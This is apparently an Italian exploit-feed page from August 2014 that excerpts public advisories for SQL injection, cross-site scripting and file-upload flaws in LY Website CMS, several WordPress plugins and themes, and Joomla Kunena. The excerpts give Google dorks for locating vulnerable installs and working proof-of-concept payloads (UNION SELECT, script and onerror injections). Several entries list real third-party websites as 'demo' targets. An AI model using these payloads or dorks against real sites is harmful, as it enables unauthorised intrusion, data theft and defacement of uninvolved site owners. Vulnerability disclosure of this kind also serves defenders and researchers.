LY Website CMS SQL Injection

18 agosto 2014 - Fonte: http://www.mondounix.com
[+] Title: LY Website CMS Sql Injection vulnerability
[+] Date: 2014-08-15
[+] Author: Iran Security Group
[+] Vendor Homepage: http://www.lywebsite.com/
[+] Tested on: Windows7 & Kali Linux
[+] Vulnerable Files: /pro.php
[+} Dork : inurl:/pro.php?CateId=
           intext:"Power By LY Website"
### POC: http://site/pro.php?CateId=[sqli]
### Demo: http://www.bypipefittings.com/pro.php?CateId=20%27
          http://www.top1rc.com/pro.php?CateId=150%27
### Credits:
[+] Special Thanks: Root SmasheR, Hekt0r, Mr.Moein,Umpire, ALIREZA_PROMIS
                    Social Engineer, Ali Ahmady, Saeed.Jok3r,M4hdi
                    Vahid Hacker, BlackErroR, Phantom.S3c
                    And All members of Iran Security Group
[+]...

Leggi il seguito »

WordPress 2.77 CSRF

17 agosto 2014 - Fonte: http://www.mondounix.com
Disqus for Wordpress
https://wordpress.org/plugins/disqus-comment-system
Version affected: up to v2.77
 
CSRF allows for activation and deactivation of the plugin and syncing comments between Disqus servers and the WP 
database.
They supposedly just fixed the CSRF issues. Ugh. Sorry Nik. Even when you tell them about nonces they still don't get 
it right.
 
More details can be found here:
https://vexatioustendencies.com/csrf-in-disqus-wordpress-plugin-v2-77/

(5)

...

Leggi il seguito »

WordPress MyBand Theme Cross Site Scripting

15 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress MyBand Theme Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-03
  |
  | [*] Vendor Homepage : http://www.mybandtheme.com
  |
  | [*] Google Dork: inurl:wp-content/themes/myband
  |
  | [*] Tested on: Windows , Mozila Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind: XSS Reflected
  |
  | [*] PoC :
  |
  | [*]  [Localhost]/wordpress/wp-content/themes/myband/timthumb.php?src=[XSS]
  |-------------------------------------------------------------------------|
...

Leggi il seguito »

WordPress Gamespeed Theme Cross Site Scripting

15 agosto 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress Gamespeed Theme Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.dalih.net/
# Date: 3/8/2014
# Tested On : Linux , Windows
# Software Link : http://www.dalih.net/wordpress-themes/game-speed/
######################
#  
http://www.centrecatala.cl/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%22%3E%3Cimg%20src=aa%20onerror=prompt%28/xss/%29%3E
#  
http://radiohope.com.ar/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://www.gameactors.com/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://300mbfilms.ir/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
######################
#...

Leggi il seguito »

WordPress SI CAPTCHA Cross Site Scripting

15 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress SI CAPTCHA Anti-Spam Plugin Cross  
site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-02
  |
  | [*] Vendor Homepage : http://wordpress.org
  |
  | [*] Software Link : http://wordpress.org/plugins/si-captcha-for-wordpress/
  |
  | [*] Version : 2.7.4
  |
  | [*] Google Dork:  
inurl:/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind:...

Leggi il seguito »

WordPress GB Gallery Slideshow 1.5 SQL Injection

14 agosto 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress GB Gallery Slideshow 1.5 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://gb-plugins.com/
 
# Software Link : http://downloads.wordpress.org/plugin/gb-gallery-slideshow.1.5.zip
 
# Date : 2014-08-09
 
# Tested on : Linux / sqlmap 1.0-dev-5b2ded0
        Linux / Mozilla Firefox
 
######################
 
# Location :  
http://localhost/wp-content/plugins/gb-gallery-slideshow/GBgallery.php
 
######################
 
# Vulnerable code :
 
    if(isset($_POST['selected_group'])){
        global $gb_post_type, $gb_group_table, $wpdb;
        $my_group_id = $_POST['selected_group'];
    ...

Leggi il seguito »

WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

14 agosto 2014 - Fonte: http://www.mondounix.com
[+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability
[+] Date: 2014-08-12
[+] Author: Hekt0r
[+] Tested on: Windows7 & Kali Linux
[+] Vendor Homepage: http://wordpress.org/
[+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/
[+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/
### POC:
http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
[+] File Uploaded:
http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt
### Demo:
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://blog.itacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
###...

Leggi il seguito »

WordPress WPSS 0.62 Cross Site Scripting

7 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress WPSS v 0.62 Plugin Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : 2014-08-05
  |
  | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
  |
  | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
  |
  | [*] Version : 0.62
  |
  | [*] Tested on: Windows , Mozila Firefox
  |-------------------------------------------------------------------------|
  | [*] PoC :
  |
  | [*]   
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
...

Leggi il seguito »

WordPress WPSS 0.62 SQL Injection

7 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress WPSS V 0.62 Plugin Sql injection
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-05
  |
  | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
  |
  | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
  |
  | [*] Version : 0.62
  |
  | [*] Tested on: Windows , Mozila Firefox
  |-------------------------------------------------------------------------|
  | [*] PoC :
  |
  | [*]   
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
...

Leggi il seguito »

Joomla Kunena Forum 3.0.5 Cross Site Scripting

4 agosto 2014 - Fonte: http://www.mondounix.com
Kunena forum extension for Joomla multiple reflected cross-site scripting vulnerabilities
 
Class:      Input Validation Error
CVE      N/A
Remote      Yes
Local      No
Published    02/07/2014
 
Credit      Raymond Rizk of Dionach (vulns@dionach.com)
Vendor      Kunena
Vulnerable    Kunena v3.0.5
Solution Status:  Fixed by Vendor
 
Kunena Forum is prone to multiple reflected cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information.
 
Kunena...

Leggi il seguito »